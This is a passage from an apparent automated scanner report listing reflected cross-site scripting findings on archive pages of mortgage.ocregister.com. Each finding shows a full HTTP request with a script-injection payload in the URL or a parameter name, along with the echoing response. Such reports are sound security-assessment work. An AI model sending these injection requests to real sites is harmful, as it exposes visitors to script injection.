<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05e5186\"><script>alert(1)</script>5f95e6db221/feed/" />
...[SNIP]...

1.221. http://mortgage.ocregister.com/2007/05/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb37e"><script>alert(1)</script>c34013ed727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cb37e\"><script>alert(1)</script>c34013ed727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/05/?cb37e"><script>alert(1)</script>c34013ed727=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05/?cb37e\"><script>alert(1)</script>c34013ed727=1feed/" />
...[SNIP]...

1.222. http://mortgage.ocregister.com/2007/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d840"><script>alert(1)</script>d1f9139be71 was submitted in the REST URL parameter 1. This input was echoed as 4d840\"><script>alert(1)</script>d1f9139be71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20074d840"><script>alert(1)</script>d1f9139be71/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20074d840\"><script>alert(1)</script>d1f9139be71/06/feed/" />
...[SNIP]...

1.223. http://mortgage.ocregister.com/2007/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a890"><script>alert(1)</script>7c589308949 was submitted in the REST URL parameter 2. This input was echoed as 2a890\"><script>alert(1)</script>7c589308949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/062a890"><script>alert(1)</script>7c589308949/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/062a890\"><script>alert(1)</script>7c589308949/feed/" />
...[SNIP]...

1.224. http://mortgage.ocregister.com/2007/06/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 194ec"><script>alert(1)</script>237ccbfc119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 194ec\"><script>alert(1)</script>237ccbfc119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/06/?194ec"><script>alert(1)</script>237ccbfc119=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/06/?194ec\"><script>alert(1)</script>237ccbfc119=1feed/" />
...[SNIP]...

1.225. http://mortgage.ocregister.com/2007/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23d"><script>alert(1)</script>6e84ace3326 was submitted in the REST URL parameter 1. This input was echoed as 8d23d\"><script>alert(1)</script>6e84ace3326 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20078d23d"><script>alert(1)</script>6e84ace3326/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078d23d\"><script>alert(1)</script>6e84ace3326/07/feed/" />
...[SNIP]...

1.226. http://mortgage.ocregister.com/2007/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d03c"><script>alert(1)</script>c44ede61d27 was submitted in the REST URL parameter 2. This input was echoed as 1d03c\"><script>alert(1)</script>c44ede61d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/071d03c"><script>alert(1)</script>c44ede61d27/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/071d03c\"><script>alert(1)</script>c44ede61d27/feed/" />
...[SNIP]...

1.227. http://mortgage.ocregister.com/2007/07/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62aca"><script>alert(1)</script>e6bbf50b3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62aca\"><script>alert(1)</script>e6bbf50b3b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/07/?62aca"><script>alert(1)</script>e6bbf50b3b1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/07/?62aca\"><script>alert(1)</script>e6bbf50b3b1=1feed/" />
...[SNIP]...

1.228. http://mortgage.ocregister.com/2007/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7bc"><script>alert(1)</script>5aaea72dd5b was submitted in the REST URL parameter 1. This input was echoed as ab7bc\"><script>alert(1)</script>5aaea72dd5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007ab7bc"><script>alert(1)</script>5aaea72dd5b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007ab7bc\"><script>alert(1)</script>5aaea72dd5b/08/feed/" />
...[SNIP]...

1.229. http://mortgage.ocregister.com/2007/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b467"><script>alert(1)</script>edf8b7e6341 was submitted in the REST URL parameter 2. This input was echoed as 3b467\"><script>alert(1)</script>edf8b7e6341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/083b467"><script>alert(1)</script>edf8b7e6341/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/083b467\"><script>alert(1)</script>edf8b7e6341/feed/" />
...[SNIP]...

1.230. http://mortgage.ocregister.com/2007/08/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7dfe"><script>alert(1)</script>03f410c0f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7dfe\"><script>alert(1)</script>03f410c0f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/08/?c7dfe"><script>alert(1)</script>03f410c0f9f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/08/?c7dfe\"><script>alert(1)</script>03f410c0f9f=1feed/" />
...[SNIP]...

1.231. http://mortgage.ocregister.com/2007/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 193b6"><script>alert(1)</script>602a3651353 was submitted in the REST URL parameter 1. This input was echoed as 193b6\"><script>alert(1)</script>602a3651353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007193b6"><script>alert(1)</script>602a3651353/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007193b6\"><script>alert(1)</script>602a3651353/09/feed/" />
...[SNIP]...

1.232. http://mortgage.ocregister.com/2007/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab9b"><script>alert(1)</script>7e39935c7da was submitted in the REST URL parameter 2. This input was echoed as eab9b\"><script>alert(1)</script>7e39935c7da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/09eab9b"><script>alert(1)</script>7e39935c7da/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09eab9b\"><script>alert(1)</script>7e39935c7da/feed/" />
...[SNIP]...

1.233. http://mortgage.ocregister.com/2007/09/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7116"><script>alert(1)</script>1999014b26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7116\"><script>alert(1)</script>1999014b26e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/09/?a7116"><script>alert(1)</script>1999014b26e=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/09/?a7116\"><script>alert(1)</script>1999014b26e=1feed/" />
...[SNIP]...

1.234. http://mortgage.ocregister.com/2007/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfb6"><script>alert(1)</script>2ffcd926e6b was submitted in the REST URL parameter 1. This input was echoed as 8bfb6\"><script>alert(1)</script>2ffcd926e6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20078bfb6"><script>alert(1)</script>2ffcd926e6b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20078bfb6\"><script>alert(1)</script>2ffcd926e6b/10/feed/" />
...[SNIP]...

1.235. http://mortgage.ocregister.com/2007/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
